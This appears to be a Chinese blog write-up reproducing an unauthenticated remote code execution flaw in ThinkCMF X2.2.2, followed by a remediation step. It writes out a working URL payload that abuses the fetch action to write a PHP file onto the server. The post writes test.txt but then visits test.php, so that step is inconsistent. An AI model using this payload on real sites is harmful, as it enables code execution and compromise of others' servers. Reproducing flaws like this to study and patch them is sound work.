一、漏洞描述ThinkCMF X2.2.2

ThinkCMF X2.2.2

二、漏洞危害

远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码

三、环境搭建

ThinkCMF X2.2.2 下载:https://github.com/SaltNego/much_tools
ThinkCMF X2.2.2漏洞的复现
ThinkCMF X2.2.2漏洞的复现
ThinkCMF X2.2.2漏洞的复现
ThinkCMF X2.2.2漏洞的复现

四、漏洞复现

访问目标网站,如下图所示:ThinkCMF X2.2.2漏洞的复现

输入payload:payload:?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.txt’,’<?php phpinfo(); ?>’)后回车

回车后页面空白如下图所示
ThinkCMF X2.2.2漏洞的复现
访问test.php
ThinkCMF X2.2.2漏洞的复现

搭建PHP
ThinkCMF X2.2.2漏洞的复现ThinkCMF X2.2.2漏洞的复现

五、漏洞修复

将 HomebaseController.class.php和AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected

相关文章:

  • 2021-12-07
  • 2021-07-18
  • 2022-12-23
  • 2021-11-12
  • 2021-08-02
  • 2021-04-23
猜你喜欢
  • 2021-07-18
  • 2022-12-23
  • 2022-01-07
  • 2021-04-17
  • 2022-02-07
  • 2021-11-04
  • 2022-01-22
相关资源
相似解决方案